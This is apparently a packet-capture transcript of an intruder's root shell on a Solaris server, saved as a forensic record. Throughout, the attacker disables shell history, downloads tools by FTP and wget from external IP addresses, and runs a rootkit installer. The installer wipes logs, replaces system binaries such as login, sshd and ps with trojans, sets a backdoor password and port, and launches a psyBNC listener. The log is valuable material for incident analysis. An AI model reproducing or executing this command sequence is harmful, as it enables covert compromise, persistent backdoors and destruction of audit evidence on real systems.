The Root Shell

The commands the attaker gave after the break-in. Attakers commands are in red.
# uname -a;ls -l /core /var/dt/tmp/DTSPCD.log;PATH=/usr/local/bin:/usr/bin:/bin:/usr/sbin:/sbin:/usr/ccs/bin:/usr/gnu/bin;export PATH;echo "BD PID(s): "`ps -fed|grep ' -s /tmp/x'|grep -v grep|awk '{print $2}'`
SunOS zoberius 5.8 Generic_108528-09 sun4u sparc SUNW,Ultra-5_10
/core: No such file or directory
/var/dt/tmp/DTSPCD.log: No such file or directory
BD PID(s): 1773
# wget
wget: not found
# w
  9:44am  up 13 day(s),  4:24,  0 users,  load average: 0.00, 0.00, 0.01
User     tty           login@  idle   JCPU   PCPU  what
# /bin/sh -i
unset HISTFILE
# unset DISPLAY
mkdir /usr/share/man/man1/.old
cd /usr/share/man/man1/.old
# # # ftp 62.211.66.16 21
bobzz
ftp: ioctl(TIOCGETP): Invalid argument
Password:joka

get wget
get dlp
get solbnc
get iupv6sun
Name (62.211.66.16:root): iupv6sun: No such file or directory.
get ipv6sun
quit
# ls
dlp
ipv6sun
solbnc
wget
# chmod +x solbnc wget dlp
# ./wget
wget: missing URL
Usage: wget [OPTION]... [URL]...

Try `wget --help' for more options.
# ./wget http://62.211.66.53/bobzz/sol.tar.gz
--09:47:58--  http://62.211.66.53:80/bobzz/sol.tar.gz
           => `sol.tar.gz'
Connecting to 62.211.66.53:80... connected!
HTTP request sent, awaiting response... 200 OK
Length: 1,884,160 [application/x-tar]

    0K -> .......... .......... .......... .......... .......... [  2%]
   50K -> .......... .......... .......... .......... .......... [  5%]
  100K -> .......... .......... .......... .......... .......... [  8%]
  150K -> .......... .......... .......... .......... .......... [ 10%]
  200K -> .......... .......... .......... .......... .......... [ 13%]
  250K -> .......... .......... .......... .......... .......... [ 16%]
  300K -> .......... .......... .......... .......... .......... [ 19%]
  350K -> .......... .......... .......... .......... .......... [ 21%]
  400K -> .......... .......... .......... .......... .......... [ 24%]
  450K -> .......... .......... .......... .......... .......... [ 27%]
  500K -> .......... .......... .......... .......... .......... [ 29%]
  550K -> .......... .......... .......... .......... .......... [ 32%]
  600K -> .......... .......... .......... .......... .......... [ 35%]
  650K -> .......... .......... .......... .......... .......... [ 38%]
  700K -> .......... .......... .......... .......... .......... [ 40%]
  750K -> .......... .......... .......... .......... .......... [ 43%]
  800K -> .......... .......... .......... .......... .......... [ 46%]
  850K -> .......... .......... .......... .......... .......... [ 48%]
  900K -> .......... .......... .......... .......... .......... [ 51%]
  950K -> .......... .......... .......... .......... .......... [ 54%]
 1000K -> .......... .......... .......... .......... .......... [ 57%]
 1050K -> .......... .......... .......... .......... .......... [ 59%]
 1100K -> .......... .......... .......... .......... .......... [ 62%]
 1150K -> .......... .......... .......... .......... .......... [ 65%]
 1200K -> .......... .......... .......... .......... .......... [ 67%]
 1250K -> .......... .......... .......... .......... .......... [ 70%]
 1300K -> .......... .......... .......... .......... .......... [ 73%]
 1350K -> .......... .......... .......... .......... .......... [ 76%]
 1400K -> .......... .......... .......... .......... .......... [ 78%]
 1450K -> .......... .......... .......... .......... .......... [ 81%]
 1500K -> .......... .......... .......... .......... .......... [ 84%]
 1550K -> .......... .......... .......... .......... .......... [ 86%]
 1600K -> .......... .......... .......... .......... .......... [ 89%]
 1650K -> .......... .......... .......... .......... .......... [ 92%]
 1700K -> .......... .......... .......... .......... .......... [ 95%]
 1750K -> .......... .......... .......... .......... .......... [ 97%]
 1800K -> .......... .......... .......... ..........            [100%]

09:55:09 (4.27 KB/s) - `sol.tar.gz' saved [1884160/1884160]

# rrrrrretar -xf sol.tar.gz
rrrrrretar: not found
# cd sol
sol: does not exist
# ./setup
./setup: not found
# cd sol
sol: does not exist
# tar -xf sol.tar.gz
# cd sol
# ./setup
[0;36mbobz oN ircNet on join #privè 
     /\                                                /\
  _/  \    ___|   Autor: bobz    |___    /  \_
       \  /                                       \  /
        \/                                         \/


   ********
   ********            **     **      **
   **                  **    **      *  *
   ******* **********  **   **      *    *
   ******* **      **  ******      ********
        ** **      **  ******     **********
   ******* **      **  **   **    **      **
   ******* **      **  **    **   **      **
           **********  **     **  **      **
     /\                                              /\
  _/  \    ___| Autor: bobz    |___    /  \_
       \  /                                     \  /
        \/                                       \/

       ...:::[ Autore bobz ]:::...
  ...:::[ On IRcnEt On Join #bobz ]:::...

Ti:AmO:RosariADelete Logz...
-------
Deleting /var/log...
/var/log/secure: No such file or directory
/var/log/secure.1: No such file or directory
/var/log/secure.2: No such file or directory
/var/log/secure.3: No such file or directory
/var/log/secure.4: No such file or directory
/var/log/boot.log: No such file or directory
/var/log/boot.log.1: No such file or directory
/var/log/boot.log.2: No such file or directory
/var/log/boot.log.3: No such file or directory
/var/log/boot.log.4: No such file or directory
/var/log/cron: No such file or directory
/var/log/cron.1: No such file or directory
/var/log/cron.2: No such file or directory
/var/log/cron.3: No such file or directory
/var/log/cron.4: No such file or directory
/var/log/lastlog: No such file or directory
/var/log/xferlog: No such file or directory
/var/log/xferlog.1: No such file or directory
/var/log/xferlog.2: No such file or directory
/var/log/xferlog.3: No such file or directory
/var/log/xferlog.4: No such file or directory
/var/log/wtmp: No such file or directory
/var/log/wtmp.1: No such file or directory
/var/log/spooler: No such file or directory
/var/log/spooler.1: No such file or directory
/var/log/spooler.2: No such file or directory
/var/log/spooler.3: No such file or directory
/var/log/spooler.4: No such file or directory
---
LogZ Cancellati...
Delete LogZ by warning
[1;37m*[0;37m Starting up at: [0;36m1038585350[0;37m
[1;37m*[0;37m Installing from /usr/share/man/man1/.old/sol - Will erase /usr/share/man/man1/.old/sol after install
[1;37m*[0;37m Checking for existing rootkits..
[1;37m*[0;37m Checking for existing rootkits..
[1;37m*[0;37m checking /etc/rc2 and /etc/rc3 for rootkits...
[1;37m*[0;37m Rootkits Removed from config files
[1;37m*[0;37m checking crond configs for rootkits...
[1;37m*[0;37m Rootkits Removed from crond config files
[1;31m*** WARNING ***[0;37m 2 suspicious files found in /dev
[1;37m***[0;37m Insert Rootkit Password : 
mixer
[1;37m***[0;37m Using Password mixer
[1;37m***[0;37m Insert Rootkit SSH Port : 
5001
[1;37m***[0;37m Using Port 5001
[1;37m***[0;37m Insert Rootkit PsyBNC Port : 
7000
[1;37m***[0;37m Using Port 7000
File processed...
[1;37m*[0;37m Making backups... su ping du passwd find ls netstat strings ps Done.
[1;37m*[0;37m Installing trojans... login sshd netstat ls find strings du passwd ping su Complete.
[1;37m*[0;37m Suid removal at atq atrm eject fdformat rdist rdist admintool ufsdump ufsrestore quota ff.core lpset lpstat netpr arp chkperm Complete.
[1;37m*[0;37m Starting Patcher...
* Patching...
 DTSCD PATCHED
 LPD PATCHED
 fingerd
 cmsd
 ttdbserverd
 sadmind
 statd
 rquotad
 rusersd
 cachefsd
 bindshells
 snmpXdmid
 Done.

--09:56:21--  ftp://sunsolve.sun.com:21/pub/patches/111085-02.zip
           => `111085-02.zip'
Connecting to sunsolve.sun.com:21... connected!
Logging in as anonymous ... Logged in!
==> TYPE I ... done.  ==> CWD pub/patches ... done.
==> PORT ... done.    ==> RETR 111085-02.zip ... done.
Length: 27,300 (unauthoritative)

    0K -> .......... .......... ......                           [100%]

09:56:45 (1.83 KB/s) - `111085-02.zip' saved [27300]

Archive:  111085-02.zip
   creating: 111085-02/
  inflating: 111085-02/.diPatch      
   creating: 111085-02/SUNWcsu/
  inflating: 111085-02/SUNWcsu/pkgmap  
  inflating: 111085-02/SUNWcsu/pkginfo  
   creating: 111085-02/SUNWcsu/install/
  inflating: 111085-02/SUNWcsu/install/checkinstall  
  inflating: 111085-02/SUNWcsu/install/copyright  
  inflating: 111085-02/SUNWcsu/install/i.none  
  inflating: 111085-02/SUNWcsu/install/patch_checkinstall  
  inflating: 111085-02/SUNWcsu/install/patch_postinstall  
  inflating: 111085-02/SUNWcsu/install/postinstall  
  inflating: 111085-02/SUNWcsu/install/preinstall  
   creating: 111085-02/SUNWcsu/reloc/
   creating: 111085-02/SUNWcsu/reloc/usr/
   creating: 111085-02/SUNWcsu/reloc/usr/bin/
  inflating: 111085-02/SUNWcsu/reloc/usr/bin/login  
  inflating: 111085-02/README.111085-02  
Copyright 2001 Sun Microsystems, Inc. All rights reserved.

This appears to be an attempt to install the same architecture and
version of a package which is already installed.  This installation
will attempt to overwrite this package.

PaTcH_MsG 2 Patch number 111085-02 is already applied.

Installation of  was suspended (administration).
No changes were made to the system.
--09:56:49--  ftp://sunsolve.sun.com:21/pub/patches/108949-07.zip
           => `108949-07.zip'
Connecting to sunsolve.sun.com:21... connected!
Logging in as anonymous ... Logged in!
==> TYPE I ... done.  ==> CWD pub/patches ... done.
==> PORT ... done.    ==> RETR 108949-07.zip ... done.
Length: 1,033,092 (unauthoritative)

    0K -> .......... .......... .......... .......... .......... [  4%]
   50K -> .......... .......... .......... .......... .......... [  9%]
  100K -> .......... .......... .......... .......... .......... [ 14%]
  150K -> .......... .......... .......... .......... .......... [ 19%]
  200K -> .......... .......... .......... .......... .......... [ 24%]
  250K -> .......... .......... .......... .......... .......... [ 29%]
  300K -> .......... .......... .......... .......... .......... [ 34%]
  350K -> .......... .......... .......... .......... .......... [ 39%]
  400K -> .......... .......... .......... .......... .......... [ 44%]
  450K -> .......... .......... .......... .......... .......... [ 49%]
  500K -> .......... .......... .......... .......... .......... [ 54%]
  550K -> .......... .......... .......... .......... .......... [ 59%]
  600K -> .......... .......... .......... .......... .......... [ 64%]
  650K -> .......... .......... .......... .......... .......... [ 69%]
  700K -> .......... .......... .......... .......... .......... [ 74%]
  750K -> .......... .......... .......... .......... .......... [ 79%]
  800K -> .......... .......... .......... .......... .......... [ 84%]
  850K -> .......... .......... .......... .......... .......... [ 89%]
  900K -> .......... .......... .......... .......... .......... [ 94%]
  950K -> .......... .......... .......... .......... .......... [ 99%]
 1000K -> ........                                               [100%]

10:01:00 (4.20 KB/s) - `108949-07.zip' saved [1033092]

Archive:  108949-07.zip
   creating: 108949-07/
  inflating: 108949-07/.diPatch      
  inflating: 108949-07/postbackout   
   creating: 108949-07/SUNWdtbas/
  inflating: 108949-07/SUNWdtbas/pkgmap  
  inflating: 108949-07/SUNWdtbas/pkginfo  
   creating: 108949-07/SUNWdtbas/install/
  inflating: 108949-07/SUNWdtbas/install/checkinstall  
  inflating: 108949-07/SUNWdtbas/install/copyright  
  inflating: 108949-07/SUNWdtbas/install/depend  
  inflating: 108949-07/SUNWdtbas/install/i.none  
  inflating: 108949-07/SUNWdtbas/install/patch_checkinstall  
  inflating: 108949-07/SUNWdtbas/install/patch_postinstall  
  inflating: 108949-07/SUNWdtbas/install/postinstall  
  inflating: 108949-07/SUNWdtbas/install/preinstall  
   creating: 108949-07/SUNWdtbas/reloc/
   creating: 108949-07/SUNWdtbas/reloc/dt/
   creating: 108949-07/SUNWdtbas/reloc/dt/lib/
  inflating: 108949-07/SUNWdtbas/reloc/dt/lib/libDtHelp.so.1  
  inflating: 108949-07/SUNWdtbas/reloc/dt/lib/libDtSvc.so.1  
   creating: 108949-07/SUNWdtbax/
  inflating: 108949-07/SUNWdtbax/pkgmap  
  inflating: 108949-07/SUNWdtbax/pkginfo  
   creating: 108949-07/SUNWdtbax/install/
  inflating: 108949-07/SUNWdtbax/install/checkinstall  
  inflating: 108949-07/SUNWdtbax/install/copyright  
  inflating: 108949-07/SUNWdtbax/install/depend  
  inflating: 108949-07/SUNWdtbax/install/i.none  
  inflating: 108949-07/SUNWdtbax/install/patch_checkinstall  
  inflating: 108949-07/SUNWdtbax/install/patch_postinstall  
  inflating: 108949-07/SUNWdtbax/install/postinstall  
  inflating: 108949-07/SUNWdtbax/install/preinstall  
   creating: 108949-07/SUNWdtbax/reloc/
   creating: 108949-07/SUNWdtbax/reloc/dt/
   creating: 108949-07/SUNWdtbax/reloc/dt/lib/
   creating: 108949-07/SUNWdtbax/reloc/dt/lib/sparcv9/
  inflating: 108949-07/SUNWdtbax/reloc/dt/lib/sparcv9/libDtHelp.so.1  
  inflating: 108949-07/SUNWdtbax/reloc/dt/lib/sparcv9/libDtSvc.so.1  
  inflating: 108949-07/postpatch     
  inflating: 108949-07/README.108949-07  
Copyright 2001 Sun Microsystems, Inc. All rights reserved.

This appears to be an attempt to install the same architecture and
version of a package which is already installed.  This installation
will attempt to overwrite this package.


Installation of  was successful.
Copyright 2001 Sun Microsystems, Inc. All rights reserved.

This appears to be an attempt to install the same architecture and
version of a package which is already installed.  This installation
will attempt to overwrite this package.


Installation of  was successful.
Archive:  111606-02.zip
   creating: 111606-02/
  inflating: 111606-02/.diPatch      
   creating: 111606-02/SUNWftpu/
  inflating: 111606-02/SUNWftpu/pkgmap  
  inflating: 111606-02/SUNWftpu/pkginfo  
   creating: 111606-02/SUNWftpu/install/
  inflating: 111606-02/SUNWftpu/install/checkinstall  
  inflating: 111606-02/SUNWftpu/install/copyright  
  inflating: 111606-02/SUNWftpu/install/i.none  
  inflating: 111606-02/SUNWftpu/install/patch_checkinstall  
  inflating: 111606-02/SUNWftpu/install/patch_postinstall  
  inflating: 111606-02/SUNWftpu/install/postinstall  
  inflating: 111606-02/SUNWftpu/install/preinstall  
   creating: 111606-02/SUNWftpu/reloc/
   creating: 111606-02/SUNWftpu/reloc/usr/
   creating: 111606-02/SUNWftpu/reloc/usr/sbin/
  inflating: 111606-02/SUNWftpu/reloc/usr/sbin/in.ftpd  
  inflating: 111606-02/README.111606-02  
Copyright 2001 Sun Microsystems, Inc. All rights reserved.

This appears to be an attempt to install the same architecture and
version of a package which is already installed.  This installation
will attempt to overwrite this package.


Installation of  was successful.
PS Trojaned[1;37m*[0;37m Primary network interface is of type: [0;36mhme[0;37m
[1;37m*[0;37m Copying utils.. passgen fixer wipe utime crt idstart ssh-dxe syn README  Done.
[1;37m*[0;37m psyBNC has now been configured on port 7000 (default) with no IDENT
[1;37m*[0;37m erasing rootkit...
./setup: test: unknown operator 16
# ./startbnc
.-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-.
 ,----.,----.,-.  ,-.,---.,--. ,-.,----. 
 |  O ||  ,-' \ \/ / | o ||   \| || ,--' 
 |  _/ _\  \   \  /  | o< | |\   || |__  
 |_|  |____/   |__|  |___||_|  \_| \___| 
      Version 2.2.1 (c) 1999-2000
              the most psychoid          
      and  the cool lam3rz Group IRCnet  
                                         
`-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=tCl=-'
Configuration File: psybnc.conf
No logfile specified, logging to log/psybnc.log
Listening on: 0.0.0.0 port 7000
psyBNC2.2.1-cBtITLdDMSNp started (PID 3262)
^[[1;37m*^[[0;37m psyBNC installed - loaded on reboot :>
# cd ..
# ./solbnc
# ./dlp
Delete LogZ by bobbino
-------
Deleting /var/log...
/var/log/secure: No such file or directory
/var/log/secure.1: No such file or directory
/var/log/secure.2: No such file or directory
/var/log/secure.3: No such file or directory
/var/log/secure.4: No such file or directory
/var/log/boot.log: No such file or directory
/var/log/boot.log.1: No such file or directory
/var/log/boot.log.2: No such file or directory
/var/log/boot.log.3: No such file or directory
/var/log/boot.log.4: No such file or directory
/var/log/cron: No such file or directory
/var/log/cron.1: No such file or directory
/var/log/cron.2: No such file or directory
/var/log/cron.3: No such file or directory
/var/log/cron.4: No such file or directory
/var/log/lastlog: No such file or directory
/var/log/xferlog: No such file or directory
/var/log/xferlog.1: No such file or directory
/var/log/xferlog.2: No such file or directory
/var/log/xferlog.3: No such file or directory
/var/log/xferlog.4: No such file or directory
/var/log/wtmp: No such file or directory
/var/log/wtmp.1: No such file or directory
/var/log/spooler: No such file or directory
/var/log/spooler.1: No such file or directory
/var/log/spooler.2: No such file or directory
/var/log/spooler.3: No such file or directory
/var/log/spooler.4: No such file or directory
---
LogZ Cancellati...
Delete LogZ by bobbino
    root   167     1  0   Nov 16 ?        0:00 /usr/sbin/inetd -s
    root  3325  3265  0 10:02:25 ?        0:00 grep inetd
---
Patch.....
Attivata by RyO
# #
This extract was created with ethereal using the follow TCP stream-tool.
Last modified: Thu May 22 15:02:44 EEST 2003